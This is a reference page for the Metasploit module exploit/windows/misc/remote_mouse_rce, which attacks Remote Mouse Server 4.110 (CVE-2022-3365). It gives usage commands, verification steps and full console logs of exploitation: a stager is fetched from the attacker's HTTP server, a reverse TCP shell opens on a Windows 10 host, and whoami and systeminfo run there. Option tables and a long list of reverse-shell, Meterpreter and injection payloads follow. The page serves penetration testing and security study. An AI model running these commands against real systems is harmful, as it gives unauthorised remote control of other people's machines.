Remote Mouse RCE - Metasploit
This page contains detailed information about how to use the exploit/windows/misc/remote_mouse_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Remote Mouse RCE
Module: exploit/windows/misc/remote_mouse_rce
Source code: modules/exploits/windows/misc/remote_mouse_rce.rb
Disclosure date: 2019-04-15
Last modification time: 2022-10-17 15:30:17 +0000
Supported architecture(s): x64, x86
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): 1978
List of CVEs: CVE-2022-3365
This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 4.110, current at the time of module writing
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
msf > use exploit/windows/misc/remote_mouse_rce
msf exploit(remote_mouse_rce) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server. This module will deploy a payload regardless if server authentication is required. Tested against 4.110, current at the time of module writing
Version 4.110 can be downloaded from https://www.remotemouse.net/downloads/RemoteMouse.exe
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/windows/misc/remote_mouse_rce - Set
rhostandlhostas required. - Do:
run - You should get a shell as the user who is running Remote Mouse.
Options
SLEEP
The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
Defaults to 1.
PATH
The path where the payload should be downloaded/staged to. Defaults to c:\\Windows\\Temp\\.
Scenarios
Remote Mouse 4.110 on Windows 10
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>whoami
whoami
win10prolicense\windows
C:\Users\windows>systeminfo
systeminfo
Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
Remote Mouse 4.110 on Windows 10, with a password
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>
Go back to menu.
Msfconsole Usage
Here is how the windows/misc/remote_mouse_rce exploit module looks in the msfconsole:
msf6 > use exploit/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/misc/remote_mouse_rce) > show info
Name: Remote Mouse RCE
Module: exploit/windows/misc/remote_mouse_rce
Platform: Windows
Arch: x64, x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-04-15
Provided by:
h00die
0RPHON
H4rk3nz0
Module side effects:
artifacts-on-disk
screen-effects
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 default
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH c:\Windows\Temp\ yes Where to stage payload for pull method
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1978 yes Port Remote Mouse runs on (TCP)
SLEEP 1 yes How long to sleep between commands
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Description:
This module utilizes the Remote Mouse Server by Emote Interactive
protocol to deploy a payload and run it from the server. This module
will only deploy a payload if the server is set without a password
(default). Tested against 4.110, current at the time of module
writing
References:
https://www.exploit-db.com/exploits/46697
https://nvd.nist.gov/vuln/detail/CVE-2022-3365
https://www.remotemouse.net/
https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py
Module Options
This is a complete list of options available in the windows/misc/remote_mouse_rce exploit:
msf6 exploit(windows/misc/remote_mouse_rce) > show options
Module options (exploit/windows/misc/remote_mouse_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PATH c:\Windows\Temp\ yes Where to stage payload for pull method
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1978 yes Port Remote Mouse runs on (TCP)
SLEEP 1 yes How long to sleep between commands
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 default
Advanced Options
Here is a complete list of advanced options supported by the windows/misc/remote_mouse_rce exploit:
msf6 exploit(windows/misc/remote_mouse_rce) > show advanced
Module advanced options (exploit/windows/misc/remote_mouse_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possibility of cleaning up files
AutoCheck true no Run check before exploit
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ForceExploit false no Override check result
ListenerBindAddress no The specific IP address to bind to if different from SRVHOST
ListenerBindPort no The port to bind to if different from SRVPORT
ListenerComm no The specific communication channel to use for this service
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy b
ut directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/misc/remote_mouse_rce module can exploit:
msf6 exploit(windows/misc/remote_mouse_rce) > show targets
Exploit targets:
Id Name
-- ----
0 default
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/misc/remote_mouse_rce exploit:
msf6 exploit(windows/misc/remote_mouse_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/ssh/interact normal No Interact with Established SSH Connection
5 payload/generic/tight_loop normal No Generic x86 Tight Loop
6 payload/windows/custom/bind_hidden_ipknock_tcp normal No Windows shellcode stage, Hidden Bind Ipknock TCP Stager
7 payload/windows/custom/bind_hidden_tcp normal No Windows shellcode stage, Hidden Bind TCP Stager
8 payload/windows/custom/bind_ipv6_tcp normal No Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
9 payload/windows/custom/bind_ipv6_tcp_uuid normal No Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
10 payload/windows/custom/bind_named_pipe normal No Windows shellcode stage, Windows x86 Bind Named Pipe Stager
11 payload/windows/custom/bind_nonx_tcp normal No Windows shellcode stage, Bind TCP Stager (No NX or Win7)
12 payload/windows/custom/bind_tcp normal No Windows shellcode stage, Bind TCP Stager (Windows x86)
13 payload/windows/custom/bind_tcp_rc4 normal No Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
14 payload/windows/custom/bind_tcp_uuid normal No Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)
15 payload/windows/custom/reverse_hop_http normal No Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager
16 payload/windows/custom/reverse_http normal No Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
17 payload/windows/custom/reverse_http_proxy_pstore normal No Windows shellcode stage, Reverse HTTP Stager Proxy
18 payload/windows/custom/reverse_https normal No Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
19 payload/windows/custom/reverse_https_proxy normal No Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
20 payload/windows/custom/reverse_ipv6_tcp normal No Windows shellcode stage, Reverse TCP Stager (IPv6)
21 payload/windows/custom/reverse_named_pipe normal No Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
22 payload/windows/custom/reverse_nonx_tcp normal No Windows shellcode stage, Reverse TCP Stager (No NX or Win7)
23 payload/windows/custom/reverse_ord_tcp normal No Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
24 payload/windows/custom/reverse_tcp normal No Windows shellcode stage, Reverse TCP Stager
25 payload/windows/custom/reverse_tcp_allports normal No Windows shellcode stage, Reverse All-Port TCP Stager
26 payload/windows/custom/reverse_tcp_dns normal No Windows shellcode stage, Reverse TCP Stager (DNS)
27 payload/windows/custom/reverse_tcp_rc4 normal No Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
28 payload/windows/custom/reverse_tcp_rc4_dns normal No Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
29 payload/windows/custom/reverse_tcp_uuid normal No Windows shellcode stage, Reverse TCP Stager with UUID Support
30 payload/windows/custom/reverse_udp normal No Windows shellcode stage, Reverse UDP Stager with UUID Support
31 payload/windows/custom/reverse_winhttp normal No Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)
32 payload/windows/custom/reverse_winhttps normal No Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)
33 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
34 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
35 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
36 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
37 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
38 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
39 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
40 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
41 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
42 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
43 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
44 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
45 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
46 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
47 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
48 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
49 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
50 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
51 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
52 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
53 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
54 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
55 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
56 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
57 payload/windows/exec normal No Windows Execute Command
58 payload/windows/loadlibrary normal No Windows LoadLibrary Path
59 payload/windows/messagebox normal No Windows MessageBox
60 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
61 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
62 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
63 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
64 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
65 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
66 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
67 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
68 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
69 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
70 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
71 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
72 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
73 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
74 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
75 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
76 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
77 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
78 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
79 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
80 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
81 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
82 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
83 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
84 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
85 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
86 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
87 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
88 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
89 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
90 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
91 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
92 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
93 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
94 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
95 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
96 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
97 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
98 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
99 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
100 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
101 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
102 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
103 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
104 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
105 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
106 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
107 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
108 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
109 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
110 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
111 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
112 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
113 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
114 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
115 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
116 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
117 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
118 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
119 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
120 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
121 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
122 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
123 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
124 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
125 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
126 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
127 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
128 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
129 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
130 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
131 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
132 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
133 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
134 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
135 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
136 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
137 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
138 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
139 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
140 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
141 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
142 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
143 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
144 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
145 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
146 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
147 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
148 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
149 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
150 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
151 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
152 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
